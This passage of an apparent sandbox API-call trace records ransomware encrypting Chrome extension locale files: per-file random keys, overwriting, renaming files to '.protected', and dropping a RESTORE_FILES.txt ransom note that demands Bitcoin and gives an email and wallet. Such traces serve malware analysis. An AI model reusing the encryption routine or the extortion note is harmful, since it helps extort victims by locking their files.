returned 155 [0080.624] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.624] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json") returned 155 [0080.624] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.624] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json") returned 155 [0080.624] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.624] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x20b, lpOverlapped=0x0) returned 1 [0080.625] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffdf5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.625] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x20b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x20b, lpOverlapped=0x0) returned 1 [0080.625] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.625] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.625] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.625] CloseHandle (hObject=0x168) returned 1 [0080.625] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.protected") returned 165 [0080.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.protected")) returned 1 [0080.626] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.626] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.626] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\RESTORE_FILES.txt") returned 159 [0080.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.627] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.627] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.628] lstrlenA (lpString="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") returned 684 [0080.628] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.628] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.628] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.628] CloseHandle (hObject=0x164) returned 1 [0080.628] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.628] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0080.628] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0080.628] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0080.628] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0080.628] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0080.628] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl") returned 141 [0080.628] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0080.628] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0080.628] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\*") returned 143 [0080.628] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.629] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.629] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.629] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.629] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.629] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.629] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\.") returned 143 [0080.629] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.629] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.629] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.629] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.630] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.630] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.630] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.630] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\..") returned 144 [0080.630] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.630] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.630] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.630] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.630] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.630] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.630] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.630] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.630] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json") returned 155 [0080.630] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.630] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.630] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.630] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.630] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json") returned 155 [0080.631] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.631] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json") returned 155 [0080.631] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.631] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json") returned 155 [0080.631] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.631] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.632] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.632] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.632] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.632] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.632] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.632] CloseHandle (hObject=0x168) returned 1 [0080.632] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.protected") returned 165 [0080.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.protected")) returned 1 [0080.633] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.633] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.633] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\RESTORE_FILES.txt") returned 159 [0080.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.633] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.633] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.634] lstrlenA (lpString="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") returned 684 [0080.634] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.634] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.634] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.634] CloseHandle (hObject=0x164) returned 1 [0080.635] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.635] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0080.635] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0080.635] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0080.635] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0080.635] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0080.635] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no") returned 141 [0080.635] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0080.635] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0080.635] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\*") returned 143 [0080.635] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.635] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.635] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.635] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.635] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.635] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.635] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\.") returned 143 [0080.635] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.635] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.635] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.635] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.635] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.635] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.635] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.635] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\..") returned 144 [0080.635] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.635] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.635] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.636] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.636] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.636] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.636] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.636] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.636] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json") returned 155 [0080.636] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.636] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.636] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.636] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.636] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json") returned 155 [0080.636] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.636] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json") returned 155 [0080.636] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.636] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json") returned 155 [0080.636] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.636] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x96, lpOverlapped=0x0) returned 1 [0080.637] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.637] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x96, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x96, lpOverlapped=0x0) returned 1 [0080.637] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.637] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.638] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.638] CloseHandle (hObject=0x168) returned 1 [0080.638] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
